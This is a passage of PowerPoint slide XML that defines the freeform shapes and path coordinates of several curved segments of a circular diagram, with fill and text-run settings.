                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="498" y="879"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="530" y="916"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="559" y="954"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="583" y="996"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="604" y="1040"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="622" y="1084"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1055" y="1196"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1314" y="877"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1314" y="877"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1298" y="828"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1277" y="782"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1255" y="735"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1232" y="692"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1208" y="648"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1179" y="606"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1150" y="565"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1121" y="524"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1089" y="485"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1055" y="446"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1021" y="409"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="984" y="375"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="944" y="341"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="905" y="307"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="865" y="278"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="823" y="246"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="778" y="219"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="733" y="192"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="688" y="166"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="641" y="144"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="593" y="122"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="543" y="100"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="493" y="83"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="443" y="66"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="390" y="51"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="338" y="37"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="282" y="27"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="227" y="17"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="171" y="10"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="116" y="5"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="61" y="2"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="0"/>
                      </a:cxn>
                    </a:cxnLst>
                    <a:rect l="0" t="0" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="1314" h="1196">
                        <a:moveTo>
                          <a:pt x="3" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="3" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="287" y="356"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="667"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="667"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="667"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="667"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="670"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="108" y="674"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="161" y="684"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="208" y="699"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="258" y="716"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="303" y="735"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="348" y="760"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="390" y="784"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="430" y="813"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="467" y="845"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="498" y="879"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="530" y="916"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="559" y="954"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="583" y="996"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="604" y="1040"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="622" y="1084"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1055" y="1196"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1314" y="877"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1314" y="877"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1298" y="828"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1277" y="782"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1255" y="735"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1232" y="692"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1208" y="648"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1179" y="606"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1150" y="565"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1121" y="524"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1089" y="485"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1055" y="446"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1021" y="409"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="984" y="375"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="944" y="341"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="905" y="307"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="865" y="278"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="823" y="246"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="778" y="219"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="733" y="192"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="688" y="166"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="641" y="144"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="593" y="122"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="543" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="493" y="83"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="443" y="66"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="390" y="51"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="338" y="37"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="282" y="27"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="227" y="17"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="171" y="10"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="116" y="5"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="61" y="2"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3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000">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                      <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="26" name="Freeform 17"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId12"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="667757" y="2013006"/>
                    <a:ext cx="2257275" cy="1476920"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:cxnLst>
                      <a:cxn ang="0">
                        <a:pos x="1311" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1311" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1256" y="2"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1197" y="5"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1142" y="10"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1087" y="17"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1031" y="27"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="979" y="37"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="923" y="51"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="873" y="66"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="820" y="83"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="770" y="100"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="723" y="122"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="673" y="144"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="628" y="166"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="580" y="192"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="535" y="219"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="493" y="246"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="451" y="278"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="409" y="307"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="369" y="341"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="332" y="375"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="295" y="409"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="261" y="446"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="227" y="485"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="195" y="524"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="164" y="565"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="134" y="606"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="108" y="648"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="82" y="692"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="61" y="735"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="37" y="782"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="18" y="828"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="0" y="877"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="0" y="877"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="446" y="755"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="691" y="1084"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="691" y="1084"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="691" y="1084"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="710" y="1040"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="731" y="996"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="757" y="954"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="783" y="918"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="815" y="879"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="849" y="845"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="886" y="813"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="926" y="784"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="968" y="760"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1010" y="735"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1058" y="716"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1105" y="699"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1155" y="684"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1205" y="674"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1258" y="670"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1314" y="667"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1598" y="356"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1311" y="0"/>
                      </a:cxn>
                    </a:cxnLst>
                    <a:rect l="0" t="0" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="1598" h="1084">
                        <a:moveTo>
                          <a:pt x="1311" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1311" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1256" y="2"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1197" y="5"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1142" y="10"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1087" y="17"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1031" y="27"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="979" y="37"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="923" y="51"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="873" y="66"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="820" y="83"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="770" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="723" y="122"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="673" y="144"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="628" y="166"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="580" y="192"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="535" y="219"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="493" y="246"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="451" y="278"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="409" y="307"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="369" y="341"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="332" y="375"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="295" y="409"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="261" y="446"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="227" y="485"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="195" y="524"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="164" y="565"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="134" y="606"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="108" y="648"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="82" y="692"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="61" y="735"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="37" y="782"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="18" y="828"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="877"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="877"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="446" y="755"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="691" y="1084"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="691" y="1084"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="691" y="1084"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="710" y="1040"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="731" y="996"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="757" y="954"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="783" y="918"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="815" y="879"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="849" y="845"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="886" y="813"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="926" y="784"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="968" y="760"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1010" y="735"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1058" y="716"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1105" y="699"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1155" y="684"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1205" y="674"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1258" y="670"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1314" y="667"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1598" y="356"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1311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000">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                      <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="27" name="Freeform 18"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId13"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="642967" y="2864797"/>
                    <a:ext cx="1404086" cy="2106380"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:cxnLst>
                      <a:cxn ang="0">
                        <a:pos x="994" y="1003"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="994" y="1003"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="965" y="981"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="936" y="959"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="910" y="935"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="884" y="910"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="860" y="881"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="839" y="854"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="818" y="825"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="799" y="794"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="783" y="762"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="768" y="730"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="754" y="696"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="744" y="662"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="736" y="626"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="731" y="589"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="728" y="553"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="725" y="516"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="725" y="516"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="728" y="467"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="733" y="419"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="744" y="372"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="757" y="329"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="757" y="329"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="512" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="66" y="122"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="66" y="122"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="66" y="122"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="50" y="168"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="37" y="214"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="26" y="263"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="16" y="314"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="8" y="363"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="414"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="0" y="465"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="0" y="516"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="0" y="516"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="594"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="11" y="672"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="21" y="750"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="40" y="825"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="61" y="898"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="90" y="969"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="119" y="1037"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="156" y="1105"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="193" y="1169"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="237" y="1232"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="285" y="1290"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="335" y="1349"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="388" y="1402"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="446" y="1453"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="506" y="1502"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="570" y="1546"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="554" y="1110"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="994" y="1003"/>
                      </a:cxn>
                    </a:cxnLst>
                    <a:rect l="0" t="0" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="994" h="1546">
                        <a:moveTo>
                          <a:pt x="994" y="1003"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="994" y="1003"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="965" y="981"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="936" y="959"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="910" y="935"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="884" y="910"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="860" y="881"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="839" y="854"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="818" y="825"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="799" y="794"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="783" y="762"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="768" y="730"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="754" y="696"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="744" y="662"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="736" y="626"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="731" y="589"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="728" y="553"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="725" y="516"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="725" y="516"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="728" y="467"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="733" y="419"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="744" y="372"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="757" y="329"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="757" y="329"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="512" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="66" y="122"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="66" y="122"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="66" y="122"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="50" y="168"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="37" y="214"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="26" y="263"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="314"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="8" y="363"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="414"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="465"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="516"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="516"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="594"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="11" y="672"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="21" y="750"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="40" y="825"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="61" y="898"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="90" y="969"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="119" y="1037"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="156" y="1105"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="193" y="1169"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="237" y="1232"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="285" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="335" y="1349"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="388" y="1402"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="446" y="1453"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="506" y="1502"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="570" y="1546"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="554" y="1110"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="994" y="1003"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="4701A7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000">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                      <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="28" name="Freeform 19"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId14"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="1262886" y="4119960"/>
                    <a:ext cx="2309537" cy="1065452"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:cxnLst>
